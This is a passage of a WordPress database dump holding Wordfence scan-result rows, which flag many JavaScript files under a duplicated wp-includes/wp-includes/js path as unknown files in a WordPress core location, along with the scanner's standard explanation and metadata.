plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/customize-loader.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27063,1631424897,1631424897,'new','knownfile',75,'a341945718846606e48ca03146d2c43f','c7e0e843a146ecc45d8ceedad09f3322','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-models.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/customize-models.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27064,1631424897,1631424897,'new','knownfile',75,'ada4cadb803ef4da4da2a5e3f999bea0','3028a7c3becd12614301ad177189629f','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-models.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/customize-models.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27065,1631424897,1631424897,'new','knownfile',75,'a860cd826b5f7b12e0d1d4cb00807f3a','8b4822568e9dd610509a55c38b896ad8','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-nav-menus.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/customize-preview-nav-menus.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27066,1631424897,1631424897,'new','knownfile',75,'8ed287889ebbe7f4b222ad4254fbd6f2','9f002e456f1ca6b55b962254a7a83416','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-nav-menus.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/customize-preview-nav-menus.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27067,1631424897,1631424897,'new','knownfile',75,'e3da0c1078a8f09ed78620b49c8752ff','3108ed5dd8a62c45c6dff7dfc7c0b8f1','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-widgets.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/customize-preview-widgets.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27068,1631424897,1631424897,'new','knownfile',75,'573bef44f73d04c8f610b9d7464beae9','89fbfaa4409fac4d7c3978e61f6920ba','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-widgets.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/customize-preview-widgets.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27069,1631424897,1631424897,'new','knownfile',75,'ea96f831cb15dbd7a18a1eeff5d99554','64dd6d6caa86cba03030d87adf054380','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/customize-preview.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27070,1631424897,1631424897,'new','knownfile',75,'e3648fbb385451ce445afdda42ed5b37','82939c18ccbabcaa5ccac35386d7852c','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/customize-preview.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27071,1631424897,1631424897,'new','knownfile',75,'0d98060f3b020f94036523d1951e06d9','99378dfab5134b21ebc6be807dc08c83','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-selective-refresh.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/customize-selective-refresh.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27072,1631424897,1631424897,'new','knownfile',75,'3ffd65717c91719bc0bb777e49534220','00d28f87a440a49a363f2d3a0a67316d','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-selective-refresh.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/customize-selective-refresh.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27073,1631424898,1631424898,'new','knownfile',75,'c0d492128e06d723598104dda8572684','ffbc5f1342b96912840405a7221b2382','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-views.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/customize-views.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27074,1631424898,1631424898,'new','knownfile',75,'791825bd917de8fbfcd0f3334c1a7a8e','fcc1a18241bcc76da99d8867b089c596','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-views.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/customize-views.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27075,1631424898,1631424898,'new','knownfile',75,'972629346cea1f6bbc99561f5c4086bf','2bb08d8fbcb4d3461bae8482edaea3cb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/a11y.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/a11y.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27076,1631424898,1631424898,'new','knownfile',75,'f328a9fa87ba3590aa257cd7d33bb1fc','3b355a04851b39b55452f036e6b3257c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/a11y.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/a11y.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27077,1631424898,1631424898,'new','knownfile',75,'3e03130f79a351803fc1cc6d5edf14b8','702bf5eff15b2951f05514b52942cd4c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/annotations.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/annotations.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27078,1631424898,1631424898,'new','knownfile',75,'f35cdb8626c13df8150429ec1c78aa45','01accab31e799e0d97ab6c29566f3027','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/annotations.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/annotations.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27079,1631424898,1631424898,'new','knownfile',75,'87b30d27baf91d42cc5a721f0776a159','dba3de58d38cb9be3d02de10ac3779b0','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/api-fetch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/api-fetch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27080,1631424898,1631424898,'new','knownfile',75,'22661950f51e9b293c373b583d0c5128','72aaf5620227f905b87a07be7024aaa1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/api-fetch.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/api-fetch.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27081,1631424898,1631424898,'new','knownfile',75,'f923b9656cde52b0b31e3005c1c1ebe4','667b0a9fd0e53e03b5b8c4c4fc028264','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/autop.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/dist/autop.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27082,1631424898,1631424898,'new','knownfile',75,'51370dda822a010353308d2bee748e68','3b9dad7dcd65d558abf6cf2d453a6dd6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/autop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/autop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27083,1631424899,1631424899,'new','knownfile',75,'9498636dc73d70dc0c8012b1985a0201','287cf2b18c51c8e8b822025d0d489350','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blob.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/blob.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27084,1631424899,1631424899,'new','knownfile',75,'8bcb03a9699cf9329cef9b2d05fcbe8c','b2a0bdd2b1082dd8cedbb056cea676a4','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blob.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/blob.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27085,1631424899,1631424899,'new','knownfile',75,'556b38ad6abd38769d221333130a5260','fdb51f16c8a4af91c3e0f085b5c3df3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-directory.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/block-directory.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27086,1631424899,1631424899,'new','knownfile',75,'83c6ad87a36f32f3d21d93c93f4c9703','6965237c9ff5e58a6298015cd88d3e8b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-directory.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/dist/block-directory.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27087,1631424899,1631424899,'new','knownfile',75,'7d10032d4289616ae411672101b9f916','6a14b8f577063e6e47a1f453fdf469d1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/block-editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27088,1631424899,1631424899,'new','knownfile',75,'968789757a39fe97fa34e4be46212bf9','5c325b69f0c08ec55c739ccb5d452767','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/block-editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27089,1631424899,1631424899,'new','knownfile',75,'cd32be0bf5b60669934a1f97ff60d3fb','7f6f6f04f2a13bd45e46f49684e98fd3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-library.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/block-library.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27090,1631424899,1631424899,'new','knownfile',75,'2307e3616921b62b490a2ecba0ff9908','a4ef2190ff6571ee4baf74ab6cfa1e59','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-library.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/block-library.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27091,1631424899,1631424899,'new','knownfile',75,'4434c8286d136ca83fe35ba3bcdcfc6d','63c075b3714b76c594b15992f3d7140f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-serialization-default-parser.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/dist/block-serialization-default-parser.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27092,1631424899,1631424899,'new','knownfile',75,'f3c4402582f3e18bef19b4f9def77b83','8822431d83c10d68375fcf27dca1ae3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27093,1631424899,1631424899,'new','knownfile',75,'bc3eee49098f854cac0545d2c2782553','88d310484b1735f97e95dba3b79cda6b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/dist/blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27094,1631424900,1631424900,'new','knownfile',75,'405bef7d8f15efc858d4213557490588','aea8a9af3134180a6dd4ddf84878aa0d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27095,1631424900,1631424900,'new','knownfile',75,'9581d97c7cbcb4a36662034bfda703cf','053e66933189655f32f9cf615fb601c5','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/components.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/components.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27096,1631424900,1631424900,'new','knownfile',75,'8237375422ab04a4cc4f7bcab8e4e51c','713828c51b5d0e6807c599847b11e45f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/components.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/components.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27097,1631424900,1631424900,'new','knownfile',75,'2496ed2c0075859d955b9beae7be2b82','93514db8812a23f2526e628fdd044260','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/compose.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/compose.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27098,1631424900,1631424900,'new','knownfile',75,'7916ea9655d68a8b199bd71dfaa0b689','55545ad42a61f5c79099ced9bdafe3fa','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/compose.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/compose.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27099,1631424900,1631424900,'new','knownfile',75,'e9aa41ef07bdc96624bd1cd90c530b4d','8a60229a2a2599429d176c8ab2bd6aca','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/core-data.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/core-data.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27100,1631424900,1631424900,'new','knownfile',75,'40793d5d5edcc8d7c901183a4cf17ea5','dfce9701ec930fb5eb9d368204284469','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/core-data.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/core-data.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27101,1631424900,1631424900,'new','knownfile',75,'a09d4814bffd4cf46e73b7149a4a0db6','70781a603bbb74ed876dd6b419238970','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data-controls.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/data-controls.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27102,1631424900,1631424900,'new','knownfile',75,'811e184162d526c5836e1c62cbfddb8f','25626874aa4e6d2e82ba218912fd7ac1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data-controls.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 